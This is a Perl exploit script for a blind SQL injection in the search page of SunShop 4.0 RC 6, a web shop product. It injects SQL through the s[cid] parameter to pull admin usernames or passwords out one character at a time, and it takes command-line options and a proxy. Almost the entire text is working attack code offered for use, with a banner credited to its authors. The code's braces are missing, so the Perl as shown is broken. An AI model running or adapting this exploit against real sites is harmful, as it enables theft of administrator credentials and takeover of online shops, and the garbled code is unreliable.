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SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit

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use LWP::UserAgent;
use Getopt::Long;

print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n -----------------oOO---(_)---OOo------------------";
print "\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |";
print "\n | k1tk4t - Indonesia - newhack[dot]org |";
print "\n | coded by DNX [dnx(at)hackermail.com] |";
print "\n --------------------------------------------------";
print "\n[!] Vendor: http://www.turnkeywebtools.com";
print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter";
print "\n[!] Solution: install v4.0.1";
print "\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>";
print "\n[!] Example: perl sunshop.pl /shop/ -i 1 -c 10 -o 1 -t ss_admins";
print "\n[!] Options:";
print "\n -i [no] Valid User-ID, default is 1";
print "\n -c [no] Valid Category-ID with products, default is 1";
print "\n -o [no] 1 = get username (default)";
print "\n 2 = get password";
print "\n -t [name] Changes the admin table name, default is admins";
print "\n -p [ip:port] Proxy support";
print "\n";

my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = 1;
my $cat = 1;
my $column = "username";
my $table = "admins";
my %options = ();
GetOptions(\%options, "i=i", "c=i", "o=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"i"}) { $user = $options{"i"}; }
if($options{"c"}) { $cat = $options{"c"}; }
if($options{"o"} && $options{"o"} == 2) { $column = "password"; }
if($options{"t"}) { $table = $options{"t"}; }

syswrite(STDOUT, "data:", 5);

for(my $i = 1; $i <= 32; $i++)
my $found = 0;
my $h = 48;
while(!$found && $h <= 57)
if(istrue2($host, $path, $table, $user, $i, $h))
$found = 1;
syswrite(STDOUT, chr($h), 1);
$h = 97;
while(!$found && $h <= 122)
if(istrue2($host, $path, $table, $user, $i, $h))
$found = 1;
syswrite(STDOUT, chr($h), 1);

print "\n[!] Exploit done\n";

sub istrue2
my $host = shift;
my $path = shift;
my $table = shift;
my $uid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $url = "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*";

$ua->proxy('http', "http://".$options{"p"});

my $response = $ua->get($url);
my $content = $response->content;
my $regexp = "Add To Cart";

if($content =~ /$regexp/)
return 1;
return 0;

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